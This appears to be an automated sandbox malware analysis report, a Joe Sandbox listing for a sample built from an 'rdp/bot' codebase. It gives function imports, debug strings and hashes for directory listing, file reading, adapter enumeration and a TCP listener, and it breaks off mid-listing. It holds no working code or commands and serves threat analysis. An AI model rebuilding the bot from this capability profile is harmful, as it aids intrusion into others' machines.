Strings

H:/Projects/rdp/bot/codebase/net.c, xrefs: 00007FFE13301EA7, 00007FFE13301ED7
[E] (%s) -> GetBestInterface failed(res=%08lx), xrefs: 00007FFE13301F09
(adapter_num != NULL), xrefs: 00007FFE13301EAE
mem_alloc, xrefs: 00007FFE13301F2A, 00007FFE13301F49
net_info, xrefs: 00007FFE13301E85, 00007FFE13301EB5, 00007FFE13301EE5, 00007FFE13301F02, 00007FFE13301F66, 00007FFE13301FA5
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE13301F31, 00007FFE13301F50
(pref_adapter_type != NULL), xrefs: 00007FFE13301EDE
[D] (%s) -> Adapter detected(name=%s,desc=%s,type=%d), xrefs: 00007FFE13301FAC
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13301EBC, 00007FFE13301EEC
[E] (%s) -> GetAdaptersInfo failed(res=%08lx), xrefs: 00007FFE13301E8C, 00007FFE13301F6D

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Heap$Process$AdaptersAllocInfo$Free
String ID: (adapter_num != NULL)$(pref_adapter_type != NULL)$H:/Projects/rdp/bot/codebase/net.c$[D] (%s) -> Adapter detected(name=%s,desc=%s,type=%d)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetAdaptersInfo failed(res=%08lx)$[E] (%s) -> GetBestInterface failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$net_info
API String ID: 2437369060-1325175688
Opcode ID: 4f5f0cc951ae45094fc637e6965b0814f4cb49fe721a5e20e3c067c32e2aedff
Instruction ID: 896879bf60f32be7526bae57bef0c10ff79cd27eb0e065f108a4fb3276ecd827
Opcode Fuzzy Hash: 4f5f0cc951ae45094fc637e6965b0814f4cb49fe721a5e20e3c067c32e2aedff
Instruction Fuzzy Hash: 40518165B19E47CDFB509B12E8402BC6260EF643A4F4441B2EA6D672B7DF7CE905C708

Function 00007FFE115057B3 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32 ref: 00007FFE115057F9
strcpy.MSVCRT ref: 00007FFE11505814
FindFirstFileA.KERNEL32 ref: 00007FFE115058E7
GetLastError.KERNEL32 ref: 00007FFE11505903
GetLastError.KERNEL32 ref: 00007FFE11505932
FindClose.KERNEL32 ref: 00007FFE11505950

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE11505842, 00007FFE1150587A, 00007FFE115058B2
fs_dir_list, xrefs: 00007FFE11505850, 00007FFE11505888, 00007FFE115058C0, 00007FFE1150591D, 00007FFE11505961
(path != NULL), xrefs: 00007FFE11505849
(name != NULL), xrefs: 00007FFE11505881
(resume_handle != NULL), xrefs: 00007FFE115058B9
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11505857, 00007FFE1150588F, 00007FFE115058C7
[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu), xrefs: 00007FFE11505968
[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu), xrefs: 00007FFE11505924

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
API String ID: 4253334766-243243391
Opcode ID: f8625e955fff89667d247409aa7d3db8d320962ed57fa589470bc2c6b3cc2cab
Instruction ID: 126f6fb474a4aff202fa324fe6c3781662e25045bdb432db696cee861b027256
Opcode Fuzzy Hash: f8625e955fff89667d247409aa7d3db8d320962ed57fa589470bc2c6b3cc2cab
Instruction Fuzzy Hash: 62614E61E2CE4785FB61579BA4403BC2259AF0237CF5445B6E86E4B2F4DF6CAD84C341

Function 00007FFE133031F3 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32 ref: 00007FFE13303239
strcpy.MSVCRT ref: 00007FFE13303254
FindFirstFileA.KERNEL32 ref: 00007FFE13303327
GetLastError.KERNEL32 ref: 00007FFE13303343
GetLastError.KERNEL32 ref: 00007FFE13303372
FindClose.KERNEL32 ref: 00007FFE13303390

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu), xrefs: 00007FFE13303364
fs_dir_list, xrefs: 00007FFE13303290, 00007FFE133032C8, 00007FFE13303300, 00007FFE1330335D, 00007FFE133033A1
[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu), xrefs: 00007FFE133033A8
(path != NULL), xrefs: 00007FFE13303289
(name != NULL), xrefs: 00007FFE133032C1
(resume_handle != NULL), xrefs: 00007FFE133032F9
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13303297, 00007FFE133032CF, 00007FFE13303307
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE13303282, 00007FFE133032BA, 00007FFE133032F2

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
API String ID: 4253334766-243243391
Opcode ID: 2845b522941af9ab75104b2202be28022406719c9b8ff0641e5ffd3905ec8be1
Instruction ID: d015aad1fbfa1cfa0e215f93017c8cd0e2858722e2d58168c775cede6c61d03d
Opcode Fuzzy Hash: 2845b522941af9ab75104b2202be28022406719c9b8ff0641e5ffd3905ec8be1
Instruction Fuzzy Hash: E8612921E0CD47C9FA619756A4443BE6250AF213B4F8401B2D87E7B2F6DE2CED85934E

Function 00007FFE11501ADA Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 89networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE11501AF8
WSAGetLastError.WS2_32 ref: 00007FFE11501BE2

Part of subcall function 00007FFE11501A0A: setsockopt.WS2_32 ref: 00007FFE11501A3A

htonl.WS2_32 ref: 00007FFE11501B2A
htons.WS2_32 ref: 00007FFE11501B3B
bind.WS2_32 ref: 00007FFE11501B54
listen.WS2_32 ref: 00007FFE11501B69
WSAGetLastError.WS2_32 ref: 00007FFE11501B7A

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

WSAGetLastError.WS2_32 ref: 00007FFE11501BA4

Strings

[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE11501BFA
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE11501C2E
tcp_listen, xrefs: 00007FFE11501B8F, 00007FFE11501BB9, 00007FFE11501BF3, 00007FFE11501C27
[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE11501B96
[E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE11501BC0

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLast$bindfflushfwritehtonlhtonslistensetsockoptsocket
String ID: [E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$tcp_listen
API String ID: 3590747132-3524496754
Opcode ID: afa8c42d7f831cd4f541fde3ac05e9aee93dd1237987719d3c8deea0743bee77
Instruction ID: d2c52e159b6847a485f8a0b9245454aa1258b11281f72c99159861b49b678338
Opcode Fuzzy Hash: afa8c42d7f831cd4f541fde3ac05e9aee93dd1237987719d3c8deea0743bee77
Instruction Fuzzy Hash: DE31B3A1A09E0281E7209FABE8401B93799BF457B4F0413B9D97E436F0EF7CE4058702

Function 00007FFE1150293B Relevance: 6.3, Strings: 5, Instructions: 43COMMON

Download Yara Rule

Strings

crc32, xrefs: 00007FFE115029BE, 00007FFE115029EE
(len > 0), xrefs: 00007FFE115029E7
(data != NULL), xrefs: 00007FFE115029B7
H:/Projects/rdp/bot/codebase/utils.c, xrefs: 00007FFE115029B0, 00007FFE115029E0
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115029C5, 00007FFE115029F5

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID:
String ID: (data != NULL)$(len > 0)$H:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$crc32
API String ID: 0-3120737415
Opcode ID: e581f0dd049c155bafc1dc3438cacaeb545f5819b0f2d1f7c41a45a99955d4e8
Instruction ID: c0504225bf0cf5cbd51d11e2698fe071eb124d4b80e765fb66aa4e6f6a44b7a4
Opcode Fuzzy Hash: e581f0dd049c155bafc1dc3438cacaeb545f5819b0f2d1f7c41a45a99955d4e8
Instruction Fuzzy Hash: 601191A1908D8785EB11CB86E8403FC2B6BFF453A5F8191B6D50D536B1CFBCA14AC344

Function 00007FFE13309BBB Relevance: 6.3, Strings: 5, Instructions: 43COMMON

Download Yara Rule

Strings

(data != NULL), xrefs: 00007FFE13309C37
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13309C45, 00007FFE13309C75
(len > 0), xrefs: 00007FFE13309C67
H:/Projects/rdp/bot/codebase/utils.c, xrefs: 00007FFE13309C30, 00007FFE13309C60
crc32, xrefs: 00007FFE13309C3E, 00007FFE13309C6E

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID:
String ID: (data != NULL)$(len > 0)$H:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$crc32
API String ID: 0-3120737415
Opcode ID: e5a641f4f4568fa5537a465d6ef1cf63843c61f9523ec9842464458d8ba22ecd
Instruction ID: d6cb196561422d16ea0229d68f02f31a8d39f15b35d27d5b87f917af59038a5a
Opcode Fuzzy Hash: e5a641f4f4568fa5537a465d6ef1cf63843c61f9523ec9842464458d8ba22ecd
Instruction Fuzzy Hash: 731142A0D08D87C9EA50CB53A8003F927B1FF66365F8042B2D56D761B6CF3CA106C748

Function 00007FFE1331B7E8 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eddfeba3403210edebded81f2e7352dbb37a411731a4da1b037d3eac54097d24
Instruction ID: 7cd4d3caac4682b09b31eba07a3fff94969e6e1d76416c4d58677b2028b81500
Opcode Fuzzy Hash: eddfeba3403210edebded81f2e7352dbb37a411731a4da1b037d3eac54097d24
Instruction Fuzzy Hash: 21D05E83E9DAC24DF2671A354C211192E905BB2B24B8E80BAE67C4A3D3A94C58008159

Function 00007FFE1331B820 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 878cbef4255dd2cc40c8794ab988d36fae64f11de0d4cbe0de4badab2383d5c2
Instruction ID: 55fae2c35ec52b9f870276e371434b4526adf686ec48c5474e14a27da727ebf6
Opcode Fuzzy Hash: 878cbef4255dd2cc40c8794ab988d36fae64f11de0d4cbe0de4badab2383d5c2
Instruction Fuzzy Hash: 76D06787D1D7C54AE3235B30AC2562A2F6427B3A00F4A81BBC2C5922B3E94C9405D222

Function 00007FFE1330A7F1 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c33678ac6d6b965f8c2d1d0dbee46628573a7ddd3699daee88d98715a5436f6
Instruction ID: 8275f39a3b046a8bad7e65e3f52feddcd1c461ba834e3d1ef98d6087dcaaf37c
Opcode Fuzzy Hash: 7c33678ac6d6b965f8c2d1d0dbee46628573a7ddd3699daee88d98715a5436f6
Instruction Fuzzy Hash: 3AA0025388DC03C4D2140B05E8421F05168DF16310B483074D46D615668A6C90D54108

Function 00007FFE11505FD5 Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 298fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 00007FFE1150601A
fseek.MSVCRT ref: 00007FFE11506039
_errno.MSVCRT ref: 00007FFE1150604D
_errno.MSVCRT ref: 00007FFE11506068
_errno.MSVCRT ref: 00007FFE11506127

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

_errno.MSVCRT ref: 00007FFE11506142
_errno.MSVCRT ref: 00007FFE11506180
fclose.MSVCRT ref: 00007FFE115061D5
_errno.MSVCRT ref: 00007FFE11506277
_errno.MSVCRT ref: 00007FFE11506292

Strings

(buf_sz != NULL), xrefs: 00007FFE115060C9
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE1150608F, 00007FFE115060C2, 00007FFE115060F5
NULL, xrefs: 00007FFE1150657B
[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d), xrefs: 00007FFE1150605C
mem_alloc, xrefs: 00007FFE115063ED
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115060A4, 00007FFE115060D7, 00007FFE1150610A
[E] (%s) -> ftell failed(path=%s,errno=%d), xrefs: 00007FFE11506286
[E] (%s) -> fread failed(path=%s,errno=%d), xrefs: 00007FFE1150641B
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11506219
[E] (%s) -> fopen failed(path=%s,errno=%d), xrefs: 00007FFE11506136
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE115063F4
(((*buf) == NULL) || ((*buf_sz) > 0)), xrefs: 00007FFE115060FC
(path != NULL), xrefs: 00007FFE11506096
fs_file_read, xrefs: 00007FFE11506055, 00007FFE1150609D, 00007FFE115060D0, 00007FFE11506103, 00007FFE1150612F, 00007FFE11506212, 00007FFE1150627F, 00007FFE11506349, 00007FFE11506414, 00007FFE11506508, 00007FFE1150658D
[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d), xrefs: 00007FFE11506350
[I] (%s) -> Done(path=%s,buf_sz=%llu), xrefs: 00007FFE11506594
[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld), xrefs: 00007FFE1150650F

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: _errno$fclosefflushfopenfseekfwrite
String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
API String ID: 2897271634-4162578512
Opcode ID: c9279b854dfb0ac51801ff11442172d9d1f40f0b26c50527cfb45b4dd190f3f2
Instruction ID: ed5dfb280b053420054dd9b49e9113dc98f693abe6a475fff1cd069ef31f6d33
Opcode Fuzzy Hash: c9279b854dfb0ac51801ff11442172d9d1f40f0b26c50527cfb45b4dd190f3f2
Instruction Fuzzy Hash: 12D18F62A09E0391FB119B97E8403BC33AAAF457B4F6550BAC90E472B5EF7CE545C320

Function 00007FFE13303A15 Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 298fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 00007FFE13303A5A
fseek.MSVCRT ref: 00007FFE13303A79
_errno.MSVCRT ref: 00007FFE13303A8D
_errno.MSVCRT ref: 00007FFE13303AA8
_errno.MSVCRT ref: 00007FFE13303B67

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

_errno.MSVCRT ref: 00007FFE13303B82
_errno.MSVCRT ref: 00007FFE13303BC0
fclose.MSVCRT ref: 00007FFE13303C15
_errno.MSVCRT ref: 00007FFE13303CB7
_errno.MSVCRT ref: 00007FFE13303CD2

Strings

[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d), xrefs: 00007FFE13303D90
(((*buf) == NULL) || ((*buf_sz) > 0)), xrefs: 00007FFE13303B3C
mem_alloc, xrefs: 00007FFE13303E2D
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE13303C59
NULL, xrefs: 00007FFE13303FBB
[I] (%s) -> Done(path=%s,buf_sz=%llu), xrefs: 00007FFE13303FD4
[E] (%s) -> ftell failed(path=%s,errno=%d), xrefs: 00007FFE13303CC6
[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld), xrefs: 00007FFE13303F4F
[E] (%s) -> fopen failed(path=%s,errno=%d), xrefs: 00007FFE13303B76
fs_file_read, xrefs: 00007FFE13303A95, 00007FFE13303ADD, 00007FFE13303B10, 00007FFE13303B43, 00007FFE13303B6F, 00007FFE13303C52, 00007FFE13303CBF, 00007FFE13303D89, 00007FFE13303E54, 00007FFE13303F48, 00007FFE13303FCD
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE13303E34
[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d), xrefs: 00007FFE13303A9C
[E] (%s) -> fread failed(path=%s,errno=%d), xrefs: 00007FFE13303E5B
(buf_sz != NULL), xrefs: 00007FFE13303B09
(path != NULL), xrefs: 00007FFE13303AD6
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13303AE4, 00007FFE13303B17, 00007FFE13303B4A
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE13303ACF, 00007FFE13303B02, 00007FFE13303B35

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: _errno$fclosefflushfopenfseekfwrite
String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
API String ID: 2897271634-4162578512
Opcode ID: 6c49b3629cd02253d251ce2eab44823ce8ffdbd5eb257f9aa9dd2471269a804c
Instruction ID: 8d31f8efc4042a532761e2edd65b96efd974ac871e1683e5c4b70c3cbd41b50e
Opcode Fuzzy Hash: 6c49b3629cd02253d251ce2eab44823ce8ffdbd5eb257f9aa9dd2471269a804c
Instruction Fuzzy Hash: 80D15D62A09E43C9FB109B57E8447BE2761AF707B4F4441B2D92E672B6DE3CE5468308

Function 00007FFE11506769 Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 226stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE1150678E
RemoveDirectoryA.KERNEL32 ref: 00007FFE115067A6
GetLastError.KERNEL32 ref: 00007FFE115067B0

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

strcpy.MSVCRT ref: 00007FFE1150687A
strlen.MSVCRT ref: 00007FFE11506882
strlen.MSVCRT ref: 00007FFE1150689E
strlen.MSVCRT ref: 00007FFE115068AF
strcpy.MSVCRT ref: 00007FFE115068C9
strlen.MSVCRT ref: 00007FFE115068D1
strlen.MSVCRT ref: 00007FFE115068F3
